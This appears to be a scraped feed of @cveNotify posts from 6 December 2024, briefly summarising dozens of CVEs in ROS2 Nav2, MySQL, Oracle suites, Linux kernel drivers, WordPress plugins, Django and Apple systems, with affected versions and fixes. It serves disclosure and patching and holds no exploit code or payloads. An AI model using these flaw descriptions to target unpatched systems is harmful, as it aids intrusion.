🚨 CVE-2024-41645Insecure Permissions vulnerability in Open Robotics Robotic Operating System 2 ROS2 navigation2 v.humble allows an attacker to execute arbitrary code via a crafted script to the nav2__amcl.🎖@cveNotify |
|
| 2024-12-06 22:37:36 |
🚨 CVE-2024-38925Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggered via remotely sending a request for change the value of dynamic-parameter`/amcl z_max` .🎖@cveNotify |
|
| 2024-12-06 22:37:35 |
🚨 CVE-2024-38924Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble versions were discovered to contain a use-after-free via the nav2_amcl process. This vulnerability is triggered via remotely sending a request to change the value of dynamic-parameter`/amcl laser_model_type` .🎖@cveNotify |
|
| 2024-12-06 22:37:31 |
🚨 CVE-2024-38922Open Robotics Robotic Operating System 2 (ROS2) and Nav2 humble version was discovered to contain a heap overflow in the nav2_amcl process. This vulnerability is triggered via sending a crafted message to the component /initialpose.🎖@cveNotify |
|
| 2024-12-06 22:37:30 |
🚨 CVE-2023-47717IBM Security Guardium 12.0 could allow a privileged user to perform unauthorized actions that could lead to a denial of service. IBM X-Force ID: 271690.🎖@cveNotify |
|
| 2024-12-06 22:37:25 |
🚨 CVE-2023-29931laravel-s 3.7.35 is vulnerable to Local File Inclusion via /src/Illuminate/Laravel.php.🎖@cveNotify |
|
| 2024-12-06 22:37:24 |
🚨 CVE-2022-45287An access control issue in Registration.aspx of Temenos CWX 8.5.6 allows authenticated attackers to escalate privileges and perform arbitrary Administrative commands.🎖@cveNotify |
|
| 2024-12-06 22:07:34 |
🚨 CVE-2024-46906In WhatsUp Gold versions released before 2024.0.1, a SQL Injection vulnerability allows an authenticated low-privileged user (at least Report Viewer permissions required) to achieve privilege escalation to the admin account.🎖@cveNotify |
|
| 2024-12-06 22:07:33 |
🚨 CVE-2024-21087Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Group Replication Plugin). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-12-06 21:37:32 |
🚨 CVE-2023-52542Permission verification vulnerability in the system module.Impact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-12-06 21:37:25 |
🚨 CVE-2024-26458Kerberos 5 (aka krb5) 1.21.2 contains a memory leak in /krb5/src/lib/rpc/pmap_rmt.c.🎖@cveNotify |
|
| 2024-12-06 21:37:24 |
🚨 CVE-2024-25763openNDS 10.2.0 is vulnerable to Use-After-Free via /openNDS/src/auth.c.🎖@cveNotify |
|
| 2024-12-06 21:07:35 |
🚨 CVE-2024-21101Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: General). Supported versions that are affected are 7.5.33 and prior, 7.6.29 and prior, 8.0.36 and prior and 8.3.0 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Cluster. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Cluster accessible data. CVSS 3.1 Base Score 2.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-12-06 21:07:34 |
🚨 CVE-2024-21086Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle CRM Technical Foundation accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-12-06 21:07:30 |
🚨 CVE-2024-21081Vulnerability in the Oracle Partner Management product of Oracle E-Business Suite (component: Attribute Admin Setup). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Partner Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Partner Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Partner Management accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-12-06 21:07:29 |
🚨 CVE-2021-47024In the Linux kernel, the following vulnerability has been resolved:vsock/virtio: free queued packets when closing socketAs reported by syzbot [1], there is a memory leak while closing thesocket. We partially solved this issue with commit ac03046ece2b("vsock/virtio: free packets during the socket release"), but weforgot to drain the RX queue when the socket is definitely closed bythe scheduled work.To avoid future issues, let's use the new virtio_transport_remove_sock()to drain the RX queue before removing the socket from the af_vsock listscalling vsock_remove_sock().[1] https://syzkaller.appspot.com/bug?extid=24452624fc4c571eedd9🎖@cveNotify |
|
| 2024-12-06 20:37:32 |
🚨 CVE-2024-21003Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u401; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-12-06 20:37:25 |
🚨 CVE-2023-24261A vulnerability in GL.iNET GL-E750 Mudi before firmware v3.216 allows authenticated attackers to execute arbitrary code via a crafted POST request.🎖@cveNotify |
|
| 2024-12-06 20:37:24 |
🚨 CVE-2023-25435libtiff 4.5.0 is vulnerable to Buffer Overflow via extractContigSamplesShifted8bits() at /libtiff/tools/tiffcrop.c:3753.🎖@cveNotify |
|
| 2024-12-06 20:07:37 |
🚨 CVE-2024-1822A vulnerability classified as problematic has been found in PHPGurukul Tourism Management System 1.0. Affected is an unknown function of the file user-bookings.php. The manipulation of the argument Full Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254610 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-12-06 20:07:30 |
🚨 CVE-2023-52373Vulnerability of permission verification in the content sharing pop-up module.Successful exploitation of this vulnerability may cause unauthorized file sharing.🎖@cveNotify |
|
| 2024-12-06 20:07:29 |
🚨 CVE-2023-52361The VerifiedBoot module has a vulnerability that may cause authentication errors.Successful exploitation of this vulnerability may affect integrity.🎖@cveNotify |
|
| 2024-12-06 19:37:45 |
🚨 CVE-2023-52357Vulnerability of serialization/deserialization mismatch in the vibration framework.Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2024-12-06 19:37:38 |
🚨 CVE-2022-42792This issue was addressed with improved data protection. This issue is fixed in iOS 16.1 and iPadOS 16. An app may be able to read sensitive location information🎖@cveNotify |
|
| 2024-12-06 19:37:37 |
🚨 CVE-2023-27243An access control issue in Makves DCAP v3.0.0.122 allows unauthenticated attackers to obtain cleartext credentials via a crafted web request to the product API.🎖@cveNotify |
|
| 2024-12-06 19:07:31 |
🚨 CVE-2021-47025In the Linux kernel, the following vulnerability has been resolved:iommu/mediatek: Always enable the clk on resumeIn mtk_iommu_runtime_resume always enable the clk, evenif m4u_dom is null. Otherwise the 'suspend' cb mightdisable the clk which is already disabled causing the warning:[ 1.586104] infra_m4u already disabled[ 1.586133] WARNING: CPU: 0 PID: 121 at drivers/clk/clk.c:952 clk_core_disable+0xb0/0xb8[ 1.594391] mtk-iommu 10205000.iommu: bound 18001000.larb (ops mtk_smi_larb_component_ops)[ 1.598108] Modules linked in:[ 1.598114] CPU: 0 PID: 121 Comm: kworker/0:2 Not tainted 5.12.0-rc5 #69[ 1.609246] mtk-iommu 10205000.iommu: bound 14027000.larb (ops mtk_smi_larb_component_ops)[ 1.617487] Hardware name: Google Elm (DT)[ 1.617491] Workqueue: pm pm_runtime_work[ 1.620545] mtk-iommu 10205000.iommu: bound 19001000.larb (ops mtk_smi_larb_component_ops)[ 1.627229] pstate: 60000085 (nZCv daIf -PAN -UAO -TCO BTYPE=--)[ 1.659297] pc : clk_core_disable+0xb0/0xb8[ 1.663475] lr : clk_core_disable+0xb0/0xb8[ 1.667652] sp : ffff800011b9bbe0[ 1.670959] x29: ffff800011b9bbe0 x28: 0000000000000000[ 1.676267] x27: ffff800011448000 x26: ffff8000100cfd98[ 1.681574] x25: ffff800011b9bd48 x24: 0000000000000000[ 1.686882] x23: 0000000000000000 x22: ffff8000106fad90[ 1.692189] x21: 000000000000000a x20: ffff0000c0048500[ 1.697496] x19: ffff0000c0048500 x18: ffffffffffffffff[ 1.702804] x17: 0000000000000000 x16: 0000000000000000[ 1.708112] x15: ffff800011460300 x14: fffffffffffe0000[ 1.713420] x13: ffff8000114602d8 x12: 0720072007200720[ 1.718727] x11: 0720072007200720 x10: 0720072007200720[ 1.724035] x9 : ffff800011b9bbe0 x8 : ffff800011b9bbe0[ 1.729342] x7 : 0000000000000009 x6 : ffff8000114b8328[ 1.734649] x5 : 0000000000000000 x4 : 0000000000000000[ 1.739956] x3 : 00000000ffffffff x2 : ffff800011460298[ 1.745263] x1 : 1af1d7de276f4500 x0 : 0000000000000000[ 1.750572] Call trace:[ 1.753010] clk_core_disable+0xb0/0xb8[ 1.756840] clk_core_disable_lock+0x24/0x40[ 1.761105] clk_disable+0x20/0x30[ 1.764501] mtk_iommu_runtime_suspend+0x88/0xa8[ 1.769114] pm_generic_runtime_suspend+0x2c/0x48[ 1.773815] __rpm_callback+0xe0/0x178[ 1.777559] rpm_callback+0x24/0x88[ 1.781041] rpm_suspend+0xdc/0x470[ 1.784523] rpm_idle+0x12c/0x170[ 1.787831] pm_runtime_work+0xa8/0xc0[ 1.791573] process_one_work+0x1e8/0x360[ 1.795580] worker_thread+0x44/0x478[ 1.799237] kthread+0x150/0x158[ 1.802460] ret_from_fork+0x10/0x30[ 1.806034] ---[ end trace 82402920ef64573b ]---[ 1.810728] ------------[ cut here ]------------In addition, we now don't need to enable the clock from thefunction mtk_iommu_hw_init since it is already enabled by the resume.🎖@cveNotify |
|
| 2024-12-06 18:37:33 |
🚨 CVE-2024-27234In fvp_set_target of fvp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-12-06 18:37:26 |
🚨 CVE-2023-33591User Registration & Login and User Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/search-result.php.🎖@cveNotify |
|
| 2024-12-06 18:37:25 |
🚨 CVE-2023-33725Broadleaf 5.x and 6.x (including 5.2.25-GA and 6.2.6-GA) was discovered to contain a cross-site scripting (XSS) vulnerability via a customer signup with a crafted email address. This is fixed in 6.2.6.1-GA.🎖@cveNotify |
|
| 2024-12-06 17:37:38 |
🚨 CVE-2018-9388In store_upgrade and store_cmd of drivers/input/touchscreen/stm/ftm4_pdc.c, there are out of bound writes due to missing bounds checks or integer underflows. These could lead to escalation of privilege.🎖@cveNotify |
|
| 2024-12-06 17:37:32 |
🚨 CVE-2017-13308In tscpu_write_GPIO_out and mtkts_Abts_write of mtk_ts_Abts.c, there is a possible buffer overflow in an sscanf due to improper input validation. This could lead to a local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-12-06 17:37:31 |
🚨 CVE-2024-21070Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Search Framework). Supported versions that are affected are 8.59, 8.60 and 8.61. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-12-06 17:37:30 |
🚨 CVE-2024-26199Microsoft Office Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-12-06 17:37:26 |
🚨 CVE-2024-26166Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-12-06 17:37:25 |
🚨 CVE-2022-25883Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.🎖@cveNotify |
|
| 2024-12-06 17:07:33 |
🚨 CVE-2024-21056Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.34 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-12-06 17:07:26 |
🚨 CVE-2024-21050Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.34 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-12-06 17:07:25 |
🚨 CVE-2024-26201Microsoft Intune Linux Agent Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-12-06 16:38:00 |
🚨 CVE-2024-54136ClipBucket V5 provides open source video hosting with PHP. ClipBucket-v5 Version 5.5.1 Revision 199 and below is vulnerable to PHP Deserialization vulnerability. The vulnerability exists in upload/upload.php where the user supplied input via collection get parameter is directly provided to unserialize function. As a result, it is possible for an adversary to inject maliciously crafted PHP serialized object and utilize gadget chains to cause unexpected behaviors of the application. This vulnerability is fixed in 5.5.1 Revision 200.🎖@cveNotify |
|
| 2024-12-06 16:37:53 |
🚨 CVE-2024-30129The HTTP host header can be manipulated and cause the application to behave in unexpected ways. Any changes made to the header would cause the request to be sent to a completely different domain/IP address.🎖@cveNotify |
|
| 2024-12-06 16:37:52 |
🚨 CVE-2024-10551The Sticky Social Icons WordPress plugin through 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-12-06 16:37:48 |
🚨 CVE-2024-21059Vulnerability in the Oracle Solaris product of Oracle Systems (component: Utility). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-12-06 16:37:47 |
🚨 CVE-2020-36779In the Linux kernel, the following vulnerability has been resolved:i2c: stm32f7: fix reference leak when pm_runtime_get_sync failsThe PM reference count is not expected to be incremented onreturn in these stm32f7_i2c_xx serious functions.However, pm_runtime_get_sync will increment the PM referencecount even failed. Forgetting to putting operation will resultin a reference leak here.Replace it with pm_runtime_resume_and_get to keep usagecounter balanced.🎖@cveNotify |
|
| 2024-12-06 16:37:43 |
🚨 CVE-2024-1829A vulnerability was found in code-projects Library System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file Source/librarian/user/student/registration.php. The manipulation of the argument email/regno/phone/username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254617 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-12-06 16:37:42 |
🚨 CVE-2024-1828A vulnerability was found in code-projects Library System 1.0. It has been classified as critical. Affected is an unknown function of the file Source/librarian/user/teacher/registration.php. The manipulation of the argument email/idno/phone/username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254616.🎖@cveNotify |
|
| 2024-12-06 16:07:27 |
🚨 CVE-2020-36785In the Linux kernel, the following vulnerability has been resolved:media: atomisp: Fix use after free in atomisp_alloc_css_stat_bufs()The "s3a_buf" is freed along with all the other items on the"asd->s3a_stats" list. It leads to a double free and a use after free.🎖@cveNotify |
|
| 2024-12-06 15:38:02 |
🚨 CVE-2024-54141phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. Prior to 4.0.0, phpMyFAQ exposes the database (ie postgreSQL) server's credential when connection to DB fails. This vulnerability is fixed in 4.0.0.🎖@cveNotify |
|
| 2024-12-06 15:37:58 |
🚨 CVE-2024-11738A flaw was found in Rustls 0.23.13 and related APIs. This vulnerability allows denial of service (panic) via a fragmented TLS ClientHello message.🎖@cveNotify |
|
| 2024-12-06 15:37:57 |
🚨 CVE-2024-44244A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 18.1 and iPadOS 18.1, watchOS 11.1, visionOS 2.1, tvOS 18.1, macOS Sequoia 15.1, Safari 18.1. Processing maliciously crafted web content may lead to an unexpected process crash.🎖@cveNotify |
|
| 2024-12-06 15:37:52 |
🚨 CVE-2024-24195robdns commit d76d2e6 was discovered to contain a misaligned address at /src/zonefile-insertion.c.🎖@cveNotify |
|
| 2024-12-06 15:37:51 |
🚨 CVE-2024-23260This issue was addressed by removing additional entitlements. This issue is fixed in macOS Sonoma 14.4. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-12-06 15:37:47 |
🚨 CVE-2024-23257The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 16.7.6 and iPadOS 16.7.6. Processing an image may result in disclosure of process memory.🎖@cveNotify |
|
| 2024-12-06 15:37:46 |
🚨 CVE-2021-46991In the Linux kernel, the following vulnerability has been resolved:i40e: Fix use-after-free in i40e_client_subtask()Currently the call to i40e_client_del_instance frees the objectpf->cinst, however pf->cinst->lan_info is being accessed afterthe free. Fix this by adding the missing return.Addresses-Coverity: ("Read from pointer after free")🎖@cveNotify |
|
| 2024-12-06 15:37:45 |
🚨 CVE-2021-46987In the Linux kernel, the following vulnerability has been resolved:btrfs: fix deadlock when cloning inline extents and using qgroupsThere are a few exceptional cases where cloning an inline extent needs tocopy the inline extent data into a page of the destination inode.When this happens, we end up starting a transaction while having a dirtypage for the destination inode and while having the range locked in thedestination's inode iotree too. Because when reserving metadata spacefor a transaction we may need to flush existing delalloc in case there isnot enough free space, we have a mechanism in place to prevent a deadlock,which was introduced in commit 3d45f221ce627d ("btrfs: fix deadlock whencloning inline extent and low on free metadata space").However when using qgroups, a transaction also reserves metadata qgroupspace, which can also result in flushing delalloc in case there is notenough available space at the moment. When this happens we deadlock, sinceflushing delalloc requires locking the file range in the inode's iotreeand the range was already locked at the very beginning of the cloneoperation, before attempting to start the transaction.When this issue happens, stack traces like the following are reported: [72747.556262] task:kworker/u81:9 state:D stack: 0 pid: 225 ppid: 2 flags:0x00004000 [72747.556268] Workqueue: writeback wb_workfn (flush-btrfs-1142) [72747.556271] Call Trace: [72747.556273] __schedule+0x296/0x760 [72747.556277] schedule+0x3c/0xa0 [72747.556279] io_schedule+0x12/0x40 [72747.556284] __lock_page+0x13c/0x280 [72747.556287] ? generic_file_readonly_mmap+0x70/0x70 [72747.556325] extent_write_cache_pages+0x22a/0x440 [btrfs] [72747.556331] ? __set_page_dirty_nobuffers+0xe7/0x160 [72747.556358] ? set_extent_buffer_dirty+0x5e/0x80 [btrfs] [72747.556362] ? update_group_capacity+0x25/0x210 [72747.556366] ? cpumask_next_and+0x1a/0x20 [72747.556391] extent_writepages+0x44/0xa0 [btrfs] [72747.556394] do_writepages+0x41/0xd0 [72747.556398] __writeback_single_inode+0x39/0x2a0 [72747.556403] writeback_sb_inodes+0x1ea/0x440 [72747.556407] __writeback_inodes_wb+0x5f/0xc0 [72747.556410] wb_writeback+0x235/0x2b0 [72747.556414] ? get_nr_inodes+0x35/0x50 [72747.556417] wb_workfn+0x354/0x490 [72747.556420] ? newidle_balance+0x2c5/0x3e0 [72747.556424] process_one_work+0x1aa/0x340 [72747.556426] worker_thread+0x30/0x390 [72747.556429] ? create_worker+0x1a0/0x1a0 [72747.556432] kthread+0x116/0x130 [72747.556435] ? kthread_park+0x80/0x80 [72747.556438] ret_from_fork+0x1f/0x30 [72747.566958] Workqueue: btrfs-flush_delalloc btrfs_work_helper [btrfs] [72747.566961] Call Trace: [72747.566964] __schedule+0x296/0x760 [72747.566968] ? finish_wait+0x80/0x80 [72747.566970] schedule+0x3c/0xa0 [72747.566995] wait_extent_bit.constprop.68+0x13b/0x1c0 [btrfs] [72747.566999] ? finish_wait+0x80/0x80 [72747.567024] lock_extent_bits+0x37/0x90 [btrfs] [72747.567047] btrfs_invalidatepage+0x299/0x2c0 [btrfs] [72747.567051] ? find_get_pages_range_tag+0x2cd/0x380 [72747.567076] __extent_writepage+0x203/0x320 [btrfs] [72747.567102] extent_write_cache_pages+0x2bb/0x440 [btrfs] [72747.567106] ? update_load_avg+0x7e/0x5f0 [72747.567109] ? enqueue_entity+0xf4/0x6f0 [72747.567134] extent_writepages+0x44/0xa0 [btrfs] [72747.567137] ? enqueue_task_fair+0x93/0x6f0 [72747.567140] do_writepages+0x41/0xd0 [72747.567144] __filemap_fdatawrite_range+0xc7/0x100 [72747.567167] btrfs_run_delalloc_work+0x17/0x40 [btrfs] [72747.567195] btrfs_work_helper+0xc2/0x300 [btrfs] [72747.567200] process_one_work+0x1aa/0x340 [72747.567202] worker_thread+0x30/0x390 [72747.567205] ? create_worker+0x1a0/0x1a0 [72747.567208] kthread+0x116/0x130 [72747.567211] ? kthread_park+0x80/0x80 [72747.567214] ret_from_fork+0x1f/0x30 [72747.569686] task:fsstress state:D stack: ---truncated---🎖@cveNotify |
|
| 2024-12-06 15:08:01 |
🚨 CVE-2024-20739Audition versions 24.0.3, 23.6.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-06 14:38:17 |
🚨 CVE-2024-4633The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘addExtraMimeType’ function in versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-06 14:38:16 |
🚨 CVE-2024-11321Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Hi e-learning Learning Management System (LMS) allows Reflected XSS.This issue affects Learning Management System (LMS): before 06.12.2024.🎖@cveNotify |
|
| 2024-12-06 14:38:15 |
🚨 CVE-2024-10516The Swift Performance Lite plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 2.3.7.1 via the 'ajaxify' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-12-06 14:38:12 |
🚨 CVE-2024-52533gio/gsocks4aproxy.c in GNOME GLib before 2.82.1 has an off-by-one error and resultant buffer overflow because SOCKS4_CONN_MSG_LEN is not sufficient for a trailing '\0' character.🎖@cveNotify |
|
| 2024-12-06 14:38:11 |
🚨 CVE-2024-39689Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi starting in 2021.05.30 and prior to 2024.07.4 recognized root certificates from `GLOBALTRUST`. Certifi 2024.07.04 removes root certificates from `GLOBALTRUST` from the root store. These are in the process of being removed from Mozilla's trust store. `GLOBALTRUST`'s root certificates are being removed pursuant to an investigation which identified "long-running and unresolved compliance issues."🎖@cveNotify |
|
| 2024-12-06 14:38:10 |
🚨 CVE-2024-28103Action Pack is a framework for handling and responding to web requests. Since 6.1.0, the application configurable Permissions-Policy is only served on responses with an HTML related Content-Type. This vulnerability is fixed in 6.1.7.8, 7.0.8.2, and 7.1.3.3.🎖@cveNotify |
|
| 2024-12-06 14:38:07 |
🚨 CVE-2024-29857An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.🎖@cveNotify |
|
| 2024-12-06 14:38:06 |
🚨 CVE-2024-26244Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-12-06 14:38:05 |
🚨 CVE-2024-1671Inappropriate implementation in Site Isolation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-12-06 14:38:01 |
🚨 CVE-2023-29405The go command may execute arbitrary code at build time when using cgo. This may occur when running "go get" on a malicious module, or when running any other command which builds untrusted code. This is can by triggered by linker flags, specified via a "#cgo LDFLAGS" directive. Flags containing embedded spaces are mishandled, allowing disallowed flags to be smuggled through the LDFLAGS sanitization by including them in the argument of another flag. This only affects usage of the gccgo compiler.🎖@cveNotify |
|
| 2024-12-06 13:37:33 |
🚨 CVE-2024-10776Lua apps can be deployed, removed, started, reloaded or stopped without authorization viaAppManager. This allows an attacker to remove legitimate apps creating a DoS attack, read and writefiles or load apps that use all features of the product available to a customer.🎖@cveNotify |
|
| 2024-12-06 13:37:26 |
🚨 CVE-2024-10772Since the firmware update is not validated, an attacker can install modified firmware on thedevice. This has a high impact on the availabilty, integrity and confidentiality up to the complete compromise of the device.🎖@cveNotify |
|
| 2024-12-06 13:37:25 |
🚨 CVE-2023-42840The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-12-06 12:37:28 |
🚨 CVE-2024-53908An issue was discovered in Django 5.1 before 5.1.4, 5.0 before 5.0.10, and 4.2 before 4.2.17. Direct usage of the django.db.models.fields.json.HasKey lookup, when an Oracle database is used, is subject to SQL injection if untrusted data is used as an lhs value. (Applications that use the jsonfield.has_key lookup via __ are unaffected.)🎖@cveNotify |
|
| 2024-12-06 12:37:27 |
🚨 CVE-2024-53907An issue was discovered in Django 5.1 before 5.1.4, 5.0 before 5.0.10, and 4.2 before 4.2.17. The strip_tags() method and striptags template filter are subject to a potential denial-of-service attack via certain inputs containing large sequences of nested incomplete HTML entities.🎖@cveNotify |
|
| 2024-12-06 11:37:41 |
🚨 CVE-2024-51569Out-of-bounds Read vulnerability in Apache NimBLE.Missing proper validation of HCI Number Of Completed Packets could lead to out-of-bound access when parsing HCI event and invalid read from HCI transport memory.This issue requires broken or bogus Bluetooth controller and thus severity is considered low.This issue affects Apache NimBLE: through 1.7.0.Users are recommended to upgrade to version 1.8.0, which fixes the issue.🎖@cveNotify |
|
| 2024-12-06 11:37:35 |
🚨 CVE-2024-47250Out-of-bounds Read vulnerability in Apache NimBLE.Missing proper validation of HCI advertising report could lead to out-of-bound access when parsing HCI event and thus bogus GAP 'device found' events being sent.This issue requires broken or bogus Bluetooth controller and thus severity is considered low.This issue affects Apache NimBLE: through 1.7.0.Users are recommended to upgrade to version 1.8.0, which fixes the issue.🎖@cveNotify |
|
| 2024-12-06 11:37:34 |
🚨 CVE-2024-9633An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.3 before 17.4.2, all versions starting from 17.5 before 17.5.4, all versions starting from 17.6 before 17.6.2. This issue allows an attacker to create a group with a name matching an existing unique Pages domain, potentially leading to domain confusion attacks.🎖@cveNotify |
|
| 2024-12-06 11:37:33 |
🚨 CVE-2023-5115An absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path.🎖@cveNotify |
|
| 2024-12-06 11:37:29 |
